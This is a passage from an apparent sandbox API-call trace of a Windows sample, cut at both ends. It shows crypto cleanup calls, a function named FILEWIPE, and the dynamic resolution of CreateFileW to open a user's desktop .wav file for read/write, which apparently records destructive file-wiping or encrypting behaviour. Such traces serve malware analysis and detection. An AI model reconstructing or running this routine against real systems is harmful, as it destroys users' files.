lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.511] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.511] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.511] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.511] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.516] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0158.516] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.516] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0158.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.516] CryptDestroyKey (hKey=0x90af18) returned 1 [0158.518] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.518] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.518] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.518] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.518] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0158.518] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0158.518] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.519] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.519] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.519] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.519] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0158.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.519] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.519] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.519] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.519] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0158.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.520] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.520] FreeLibrary (hLibModule=0x74f20000) returned 1 [0158.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.521] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.522] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.522] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0158.522] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.525] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x64768a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 0x90ae18 [0158.525] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0158.525] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.525] CharLowerBuffW (in: lpsz="byte[33264]", cchLength=0xb | out: lpsz="byte[33264]") returned 0xb [0158.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.526] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0158.526] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.526] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0158.526] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0158.527] FreeLibrary (hLibModule=0x75c90000) returned 1 [0158.527] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.527] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0158.527] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0158.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0158.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.530] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.530] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0158.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0158.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.530] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileW") returned 0x759a3f5c [0158.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0x9cd378 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0158.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cosd3imwd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9cd378 